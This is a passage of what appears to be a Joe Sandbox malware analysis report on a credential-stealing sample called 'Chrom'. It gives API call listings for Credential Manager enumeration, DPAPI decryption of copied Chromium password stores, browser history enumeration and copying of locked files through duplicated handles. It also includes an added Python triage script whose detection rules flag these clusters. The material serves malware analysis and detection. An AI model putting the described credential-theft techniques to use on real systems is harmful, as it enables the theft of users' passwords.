  • Part of subcall function 0040CC16: _wcslwr.MSVCRT ref: 0040CCC5
  • Part of subcall function 0040CC16: wcslen.MSVCRT ref: 0040CCDA
  • Part of subcall function 0040B8EC: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040B925
  • Part of subcall function 0040B8EC: wcslen.MSVCRT ref: 0040B942
  • Part of subcall function 0040B8EC: wcsncmp.MSVCRT ref: 0040B974
  • Part of subcall function 0040B8EC: memset.MSVCRT ref: 0040B9CD
  • Part of subcall function 0040B8EC: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040B9EE
  • Part of subcall function 0041607F: GetProcAddress.KERNEL32(?,00000000), ref: 004160B2
• memset.MSVCRT ref: 0041416A
• memset.MSVCRT ref: 00414182
• memset.MSVCRT ref: 004142F8
• memset.MSVCRT ref: 00414310
• memset.MSVCRT ref: 0041439B
• memset.MSVCRT ref: 00414448
• memset.MSVCRT ref: 00414460
• memset.MSVCRT ref: 004144DA
• _wcsicmp.MSVCRT ref: 00414820
  • Part of subcall function 004010A6: CopyFileW.KERNEL32(?,?,00000000,?,?), ref: 004011E4
  • Part of subcall function 004010A6: memset.MSVCRT ref: 00401208
  • Part of subcall function 004010A6: DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401499
• memset.MSVCRT ref: 00414590
  • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                        • memset.MSVCRT ref: 0041461C
                                                                                                                                                        • memset.MSVCRT ref: 00414634
                                                                                                                                                        • memset.MSVCRT ref: 0041464C
                                                                                                                                                        • memset.MSVCRT ref: 00414765
                                                                                                                                                        • memset.MSVCRT ref: 0041477D
                                                                                                                                                        • memset.MSVCRT ref: 004144F2
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004010D3
                                                                                                                                                          • Part of subcall function 004010A6: wcsrchr.MSVCRT ref: 004010EF
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 0040110D
                                                                                                                                                          • Part of subcall function 004010A6: memset.MSVCRT ref: 004011AC
                                                                                                                                                          • Part of subcall function 004010A6: CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3
                                                                                                                                                          • Part of subcall function 0040B3FA: wcscmp.MSVCRT ref: 0040B419
                                                                                                                                                          • Part of subcall function 0040B3FA: wcscmp.MSVCRT ref: 0040B42A
                                                                                                                                                        • memset.MSVCRT ref: 004143B3
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$Filewcslen$wcscmpwcsrchr$AddressAttributesCopyCreateCredDeleteEnumerateFolderPathProcSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                        • API String ID: 241508006-3798722523
                                                                                                                                                        • Opcode ID: b227ea8de1fefab8d68ff4433db62ad9ea1528c89fddca809f1fa64c36be4a22
                                                                                                                                                        • Instruction ID: 160b922070d72b691ae3132d21ec35459ff4d79c06758521881ebd4265f3e304
                                                                                                                                                        • Opcode Fuzzy Hash: b227ea8de1fefab8d68ff4433db62ad9ea1528c89fddca809f1fa64c36be4a22
                                                                                                                                                        • Instruction Fuzzy Hash: 785276B2900219ABDB10EB51CD46EDFB77CAF45344F0501BBF508A6192EB385E948B9E

                                                                                                                                                        Control-flow Graph

APIs
  • Part of subcall function 004053E1: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405400
  • Part of subcall function 004053E1: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00405412
  • Part of subcall function 004053E1: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405426
  • Part of subcall function 004053E1: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00405451
• SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 004122E6
• GetModuleHandleW.KERNEL32(00000000,00416ACC,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 004122FF
• EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00412306
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030
• Opcode ID: a23a53bd30f639ab6e593c7dcdfa98b0c8a8014cf9dc6c45a60d320dd2194cd3
• Instruction ID: 2178966f4a80c8fc13f983811a773bf45d976ad6511b0e23f4840dc4cb99dd1b
• Opcode Fuzzy Hash: a23a53bd30f639ab6e593c7dcdfa98b0c8a8014cf9dc6c45a60d320dd2194cd3
• Instruction Fuzzy Hash: 01519D71508345ABC720AFA2CD4899F77A8FF85348F40083EFA45E2151DB79D8558B6A

Control-flow Graph

APIs
• memset.MSVCRT ref: 004010D3
  • Part of subcall function 0040A22F: wcscpy.MSVCRT ref: 0040A234
  • Part of subcall function 0040A22F: wcsrchr.MSVCRT ref: 0040A23C
• wcsrchr.MSVCRT ref: 004010EF
• memset.MSVCRT ref: 0040110D
• memset.MSVCRT ref: 004011AC
• CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 004011C3
• CopyFileW.KERNEL32(?,?,00000000,?,?), ref: 004011E4
• CloseHandle.KERNELBASE(00000000,?,?), ref: 004011EF
• memset.MSVCRT ref: 00401208
• memset.MSVCRT ref: 0040127E
• memcmp.MSVCRT(?,v10,00000003), ref: 00401373
  • Part of subcall function 00407687: GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
  • Part of subcall function 00407687: FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
  • Part of subcall function 00407687: CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401499
• memset.MSVCRT ref: 00401507
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040151A
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00401541
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 1297422669-2783969131
• Opcode ID: b514bb59bfc53d624b8cafe0ce1b0ddb728e252bcecfd9585c573925251d1e23
• Instruction ID: f518f8cdbbaa5cc0a15761cad5a7de08cb03170c242fb237df98171784d43b0b
• Opcode Fuzzy Hash: b514bb59bfc53d624b8cafe0ce1b0ddb728e252bcecfd9585c573925251d1e23
• Instruction Fuzzy Hash: 26D18472D00218AFEB10EB95DC81EEE77B8AF04314F1144BAF515F7292DA785F848B99

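The call clusters in these listings are what an analyst pivots on rather than the individual APIs: CredEnumerateW against the Windows Credential Manager; CopyFileW of a store followed by CryptUnprotectData and DeleteFileW, with a 3-byte memcmp against the Chromium "v10" blob prefix; and, in the listing that follows, NtQuerySystemInformation with class 0x10 (SystemHandleInformation), OpenProcess with 0x40 (PROCESS_DUP_HANDLE), DuplicateHandle, MapViewOfFile and WriteFile, which is the way a tool copies a file that another process keeps open with a restrictive share mode. The Python below is an added example and is not code from Joe Sandbox or from the analysed sample: it parses call lines in the report's own format and flags those clusters. The rule names and descriptions, the constant labels and the condensed sample lines are this example's constructions.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.

Added example, not code from Joe Sandbox or from the analysed sample: it parses
the report's call lines (direct calls and "Part of subcall function" lines),
turns 8-hex-digit arguments into integers, and flags call clusters that in this
report correspond to credential harvesting.  Rule names and sample snippets
(condensed from the listings on this page) are constructed here.
"""
import re
from typing import Callable, Dict, List, NamedTuple, Optional, Tuple, Union

Arg = Union[int, str]

class Call(NamedTuple):
    api: str
    module: str
    args: List[Arg]
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when the line is "Part of subcall function"

_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
_HEX = re.compile(r"^-?[0-9A-Fa-f]{8}$")

def _arg(tok: str) -> Arg:
    tok = tok.strip()
    return int(tok, 16) if _HEX.match(tok) else tok   # "?" and literals stay as text

def parse_calls(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue                                    # headers such as "Strings"
        raw = m.group("args")
        args = [_arg(t) for t in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod").upper(), args,
                          m.group("ref").upper(), m.group("sub")))
    return calls

PROCESS_DUP_HANDLE = 0x0040        # OpenProcess access right (Windows SDK value)
SYSTEM_HANDLE_INFORMATION = 0x10   # NtQuerySystemInformation information class

def _has(calls: List[Call], *apis: str) -> bool:
    names = {c.api for c in calls}
    return all(a in names for a in apis)

def _first_args(calls: List[Call], api: str) -> List[Arg]:
    return [c.args[0] for c in calls if c.api == api and c.args]

def rule_credman(calls: List[Call]) -> bool:
    return _has(calls, "CredEnumerateW")               # Credential Manager dump

def rule_dpapi_copied_store(calls: List[Call]) -> bool:
    # copy a protected store aside, decrypt it with DPAPI, delete the copy
    return _has(calls, "CopyFileW", "CryptUnprotectData", "DeleteFileW")

def rule_chrome_v10_blob(calls: List[Call]) -> bool:
    # 3-byte compare against "v10", the prefix of Chromium's AES-GCM password blobs
    return any(c.api == "memcmp" and "v10" in c.args and 3 in c.args for c in calls)

def rule_locked_file_copy(calls: List[Call]) -> bool:
    # enumerate system handles, open the owner with PROCESS_DUP_HANDLE, duplicate its
    # file handle, map it and write the bytes out: copies a file held open elsewhere
    return (SYSTEM_HANDLE_INFORMATION in _first_args(calls, "NtQuerySystemInformation")
            and any(isinstance(a, int) and a & PROCESS_DUP_HANDLE
                    for a in _first_args(calls, "OpenProcess"))
            and _has(calls, "DuplicateHandle", "MapViewOfFile", "WriteFile"))

RULES: Dict[str, Tuple[Callable[[List[Call]], bool], str]] = {
    "credman_enum": (rule_credman, "enumerates Windows Credential Manager entries"),
    "dpapi_copied_store": (rule_dpapi_copied_store,
                           "copies a store, decrypts it with CryptUnprotectData, deletes the copy"),
    "chrome_v10_blob": (rule_chrome_v10_blob, "handles Chromium 'v10' encrypted password blobs"),
    "locked_file_copy": (rule_locked_file_copy, "copies a locked file via a duplicated handle"),
}

def triage(text: str) -> Dict[str, str]:
    """Return {rule_name: description} for every rule the listing satisfies."""
    calls = parse_calls(text)
    return {name: desc for name, (fn, desc) in RULES.items() if fn(calls)}

# Constructed inputs: lines condensed from the listings on this page.
SAMPLE_CREDMAN = """
• Part of subcall function 0040B8EC: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040B925
"""
SAMPLE_DPAPI = """
• CopyFileW.KERNEL32(?,?,00000000,?,?), ref: 004011E4
• memcmp.MSVCRT(?,v10,00000003), ref: 00401373
• Part of subcall function 00407687: CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401499
"""
SAMPLE_DUP_HANDLE = """
• Part of subcall function 0040BAE3: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040BB73
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040BDF1
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040BE1D
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040BE71
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040C401,00000000), ref: 0040BE8C
"""

if __name__ == "__main__":
    for label, sample in (("credman", SAMPLE_CREDMAN), ("dpapi", SAMPLE_DPAPI), ("dup", SAMPLE_DUP_HANDLE)):
        print(label, "->", sorted(triage(sample)))
```

Paste a whole function listing (the "APIs" section of one block) into `triage` to get the matching rule names; unmatched lines such as "Strings" or "Memory Dump Source" are skipped. The rules key on the first argument where the report records it (the information class passed to NtQuerySystemInformation, the access mask passed to OpenProcess), so a listing that only shows "?" for those arguments will not match the handle-duplication rule and has to be read by hand.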
                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040BAE3: memset.MSVCRT ref: 0040BB0B
                                                                                                                                                          • Part of subcall function 0040BAE3: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BB32
                                                                                                                                                          • Part of subcall function 0040BAE3: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040BB73
                                                                                                                                                          • Part of subcall function 0040BAE3: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040BB9C
                                                                                                                                                          • Part of subcall function 0040BAE3: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040BBA7
                                                                                                                                                          • Part of subcall function 0040BAE3: _wcsicmp.MSVCRT ref: 0040BC10
                                                                                                                                                          • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040BDF1
                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040BE10
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040BE1D
                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040BE32
                                                                                                                                                          • Part of subcall function 0040A004: GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
                                                                                                                                                          • Part of subcall function 0040A004: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
                                                                                                                                                          • Part of subcall function 0040A004: GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044
                                                                                                                                                          • Part of subcall function 00409C9B: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD
                                                                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040BE5C
                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040BE71
                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040C401,00000000), ref: 0040BE8C
                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BE93
                                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 0040BE9C
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040BEA1
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040BEA6
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040BEAB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                        • String ID: bhv
                                                                                                                                                        • API String ID: 4234240956-2689659898
                                                                                                                                                        • Opcode ID: 131e7068980ec65edbb2b84da51a09623bafa4f0fcb63a4d56c059ca8b9c60f2
                                                                                                                                                        • Instruction ID: 81637e7f8efa5e62e8569a4f404239e6b0c8c80861be29ec9ae91375cb438629
                                                                                                                                                        • Opcode Fuzzy Hash: 131e7068980ec65edbb2b84da51a09623bafa4f0fcb63a4d56c059ca8b9c60f2
                                                                                                                                                        • Instruction Fuzzy Hash: 26411676900218FBCF119FA1CC499DFBFB9EF09750F108026FA04A6251D7749A44DBE9

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        control_flow_graph 571 41599c-41599f 572 4159a1-4159a7 call 40ae2a 571->572 573 4159f2 571->573 575 4159ac-4159f1 GetProcAddress * 5 572->575 575->573
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 004159BC
                                                                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004159C8
                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004159D4
                                                                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004159E0
                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004159EC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                        • API String ID: 2941347001-70141382
                                                                                                                                                        • Opcode ID: 8d8171eaa7233f23c424eae13fe9b2c2f689341781acc4346e714e5fd4705eee
                                                                                                                                                        • Instruction ID: 12a6a4dc47c8e0d72b77561104e235da68e0514af3b1e08ca0077668fc786df3
                                                                                                                                                        • Opcode Fuzzy Hash: 8d8171eaa7233f23c424eae13fe9b2c2f689341781acc4346e714e5fd4705eee
                                                                                                                                                        • Instruction Fuzzy Hash: 11F012B4840B00AACB306F759818B1ABEE0EF98701B218C2EE8C093651DBB9A044CF49

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        control_flow_graph 576 44692c-446946 call 446b3c GetModuleHandleA 579 446967-44696a 576->579 580 446948-446953 576->580 582 446993-4469e2 __set_app_type __p__fmode __p__commode call 402f19 579->582 580->579 581 446955-44695e 580->581 584 446960-446965 581->584 585 44697f-446983 581->585 591 4469e4-4469ef __setusermatherr 582->591 592 4469f0-446a46 call 446b28 _initterm __wgetmainargs _initterm 582->592 584->579 588 44696c-446973 584->588 585->579 586 446985-446987 585->586 590 44698d-446990 586->590 588->579 589 446975-44697d 588->589 589->590 590->582 591->592 595 446a56-446a5d 592->595 596 446a48-446a51 592->596 598 446aa4-446aa8 595->598 599 446a5f-446a6a 595->599 597 446b10-446b15 call 446b75 596->597 600 446a7d-446a83 598->600 601 446aaa-446aaf 598->601 602 446a72-446a76 599->602 603 446a6c-446a70 599->603 607 446a85-446a89 600->607 608 446a8b-446a9c GetStartupInfoW 600->608 601->598 602->600 605 446a78-446a7a 602->605 603->599 603->602 605->600 607->605 607->608 609 446ab1-446ab3 608->609 610 446a9e-446aa2 608->610 611 446ab4-446acc GetModuleHandleA call 4122ba 609->611 610->611 614 446ad5-446b0e _cexit 611->614 615 446ace-446acf exit 611->615 614->597 615->614
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2827331108-0
                                                                                                                                                        • Opcode ID: bed64be1af292bd851980aaafa98510c34be8557dbabbe7686d3cd671069d409
                                                                                                                                                        • Instruction ID: bb7a70230f37617634207b9b7a32dcb89b9454a8d8bf9e63e77bc0a4be8b0e92
                                                                                                                                                        • Opcode Fuzzy Hash: bed64be1af292bd851980aaafa98510c34be8557dbabbe7686d3cd671069d409
                                                                                                                                                        • Instruction Fuzzy Hash: CA519FB1D00714EAEB209F64D848AAE7BF0EB0A715F21813BE451E7291D7788885CB5A

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040C746
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 0040C34B: memset.MSVCRT ref: 0040C36D
                                                                                                                                                          • Part of subcall function 0040C34B: memset.MSVCRT ref: 0040C387
                                                                                                                                                          • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C7BB
                                                                                                                                                        • wcschr.MSVCRT ref: 0040C7D2
                                                                                                                                                        • wcschr.MSVCRT ref: 0040C7F2
                                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C817
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040C821
                                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C84D
                                                                                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C85E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                        • String ID: visited:
                                                                                                                                                        • API String ID: 2470578098-1702587658
                                                                                                                                                        • Opcode ID: d051b6bee11d765b52f56e7531097d9158d55cb802cc7655925d0cc4dd98efa9
                                                                                                                                                        • Instruction ID: 636e8e32e5b1bb4d98569f2fcce6fed8f1b817539a9b6f5200b068eacb01c51d
                                                                                                                                                        • Opcode Fuzzy Hash: d051b6bee11d765b52f56e7531097d9158d55cb802cc7655925d0cc4dd98efa9
                                                                                                                                                        • Instruction Fuzzy Hash: 90419776D00219EBDB10EF95CC85AAFBB78EF45714F10017AE904F7281D738AA45CBA9

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        control_flow_graph 642 40bed3-40beff call 408199 call 4083cc 647 40bf05-40bf43 memset 642->647 648 40bff7-40c006 call 4081df 642->648 650 40bf46-40bf58 call 4086cb 647->650 654 40bf5a-40bf77 call 40baae * 2 650->654 655 40bfce-40bfdb call 40838f 650->655 654->655 666 40bf79-40bf7b 654->666 655->650 660 40bfe1-40bfe4 655->660 662 40bfe6-40bfee free 660->662 663 40bfef-40bff2 call 40b02a 660->663 662->663 663->648 666->655 667 40bf7d-40bf93 call 408c6a 666->667 667->655 670 40bf95-40bfa0 call 40b109 667->670 670->655 673 40bfa2-40bfc9 _snwprintf call 40aef6 670->673 673->655
                                                                                                                                                        APIs
